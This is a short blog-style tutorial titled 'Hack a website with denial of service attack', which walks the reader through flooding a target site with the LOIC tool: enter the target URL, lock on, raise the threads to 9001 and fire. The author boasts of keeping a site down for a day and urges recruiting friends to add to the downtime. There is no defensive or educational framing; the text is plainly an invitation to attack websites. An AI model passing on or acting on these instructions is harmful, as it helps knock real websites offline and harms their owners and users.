This attack also recently hit twitter on 6th August 2009,lot of people had trouble on logging on twitter,It was brought down by denial of service attack,They tired up there server so no one can get on log on it.Websites like facebook,ebay etc have also been victim of this attack.

Hack a website with denial of service attack

Now i will show you how to hack a website with Denial of service attack. For this tutorial we will be using one of the most effective and one of the least known tools called "Low Orbit Ion Cannon", created by Anonymous members from 4chan.org, this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running. Remember that this tool will work best with high internet speeds, and try not to go for impossible targets (like Google, Myspace,Yahoo). LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.

Prerequisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.
(I am not giving a download link because then i will be accused for exiting hackers,try goggling).

Step 1: Type the target URL in the URL box.

Step 2: Click lock on.

Step 3: Change the threads to 9001 for maximum efficiency.

Step 4: Click the big button "IMMA FIRIN MAH LAZAR!"

Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!

Read More